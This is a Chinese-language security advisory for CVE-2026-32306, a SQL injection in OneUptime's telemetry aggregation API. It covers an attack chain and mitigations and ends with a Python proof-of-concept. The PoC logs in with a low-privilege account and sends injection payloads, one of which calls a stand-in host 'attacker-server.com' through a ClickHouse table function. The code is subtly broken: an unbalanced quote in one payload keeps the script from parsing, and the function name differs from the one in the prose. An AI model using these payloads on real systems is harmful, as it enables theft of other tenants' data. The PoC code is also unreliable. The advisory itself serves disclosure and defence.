CVE-2026-32306 OneUptime 遥测聚合API SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-32306

漏洞类型

SQL注入

CVSS评分

9.9 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OneUptime

漏洞概述

OneUptime是一款开源的在线服务监控和管理解决方案。在10.0.23之前的版本中，其遥测聚合API存在严重的SQL注入漏洞。攻击者可以通过API接口传入恶意的aggregationType、aggregateColumnName和aggregationTimestampColumnName参数，这些参数未经任何安全处理直接被拼接到ClickHouse数据库的SQL查询语句中。由于使用了.append()方法将这些参数直接追加到SQL语句中（文档标注为"可信SQL"），导致原有的参数验证机制失效。攻击者利用此漏洞可以绕过认证限制，以低权限用户身份注入任意SQL语句，进而实现读取所有租户的遥测数据、修改数据库内容，甚至通过ClickHouse表函数实现远程代码执行。该漏洞CVSS评分高达9.9，属于严重级别，对系统安全性构成极大威胁。建议受影响用户立即升级到10.0.23或更高版本以修复此漏洞。

技术细节

漏洞根源在于OneUptime的遥测聚合功能模块，该模块负责从ClickHouse数据库中聚合和分析监控数据。问题代码位于处理聚合请求的API端点，该端点接收三个关键参数：aggregationType（聚合类型）、aggregateColumnName（聚合列名）和aggregationTimestampColumnName（聚合时间戳列名）。开发者使用.append()方法将这些用户可控参数直接追加到SQL查询字符串中，错误地认为这些参数是可信的。然而，.append()方法只是简单的字符串拼接，不会进行任何SQL转义或参数化处理。攻击者可以通过构造特殊的SQL片段，如使用单引号、UNION SELECT、注释符等，突破原有的查询结构。由于ClickHouse支持表函数和外部表查询，攻击者甚至可以利用clickhouse_remote函数实现远程代码执行或在数据库中写入恶意数据。漏洞利用的关键前提是攻击者需要具有认证用户身份，但低权限账户即可完成攻击，这大大降低了利用门槛。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标OneUptime实例版本，确认版本低于10.0.23，并定位遥测聚合API端点

STEP 2

2. 认证获取

攻击者使用低权限账户登录系统，获取有效的访问令牌（Bearer Token）

STEP 3

3. 构造恶意请求

攻击者构造包含SQL注入载荷的POST请求，在aggregationType、aggregateColumnName或aggregationTimestampColumnName参数中注入恶意SQL代码

STEP 4

4. SQL注入执行

恶意参数通过.append()方法直接拼接到ClickHouse SQL查询中，攻击者注入的SQL代码被执行

STEP 5

5. 数据窃取

利用UNION SELECT或条件查询提取所有租户的遥测数据、用户信息等敏感数据

STEP 6

6. 权限提升与RCE

通过ClickHouse表函数（如clickhouse_remote）或写入恶意数据到表，实现远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3 """ CVE-2026-32306 PoC - OneUptime SQL Injection in Telemetry Aggregation API Note: This is for educational and authorized testing purposes only. """ import requests import json TARGET_URL = "https://target-oneuptime-instance.com" API_ENDPOINT = "/api/telemetry/aggregate" USERNAME = "[email protected]" PASSWORD = "password123" def get_auth_token(): """Authenticate and get access token""" login_url = f"{TARGET_URL}/api/account/login" payload = { "email": USERNAME, "password": PASSWORD } response = requests.post(login_url, json=payload, verify=False) if response.status_code == 200: return response.json().get('token') return None def exploit_sql_injection(token): """Exploit SQL injection to extract database info""" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Malicious payload - extracts ClickHouse version payload = { "aggregationType": "groupBy', "aggregateColumnName": "(SELECT version())-- ", "aggregationTimestampColumnName": "createdAt" } response = requests.post( f"{TARGET_URL}{API_ENDPOINT}", json=payload, headers=headers, verify=False ) print(f"Status: {response.status_code}") print(f"Response: {response.text}") return response def exploit_rce_via_clickhouse_remote(token): """Attempt RCE via ClickHouse table functions""" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Payload for potential remote code execution payload = { "aggregationType": "sum", "aggregateColumnName": "_clickhouse_remote('attacker-server.com', 'malicious_query')", "aggregationTimestampColumnName": "createdAt" } response = requests.post( f"{TARGET_URL}{API_ENDPOINT}", json=payload, headers=headers, verify=False ) return response if __name__ == "__main__": print("CVE-2026-32306 OneUptime SQL Injection PoC") print("=" * 50) # Step 1: Authenticate token = get_auth_token() if not token: print("[-] Authentication failed") exit(1) print("[+] Authentication successful") # Step 2: Exploit SQL injection print("[*] Attempting SQL injection...") exploit_sql_injection(token)

影响范围

OneUptime < 10.0.23

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 通过网络层访问控制限制对遥测聚合API的访问，仅允许受信任的IP地址访问；2) 在API网关层面实现输入过滤，拦截包含SQL特殊字符（如单引号、双破折号、分号等）的请求；3) 临时禁用遥测聚合功能，直到完成版本升级；4) 增强数据库监控和告警机制，及时发现异常查询行为；5) 审查并限制ClickHouse数据库用户的权限，移除不必要的表函数权限。需要注意的是，这些临时措施不能完全消除漏洞风险，强烈建议尽快完成版本升级。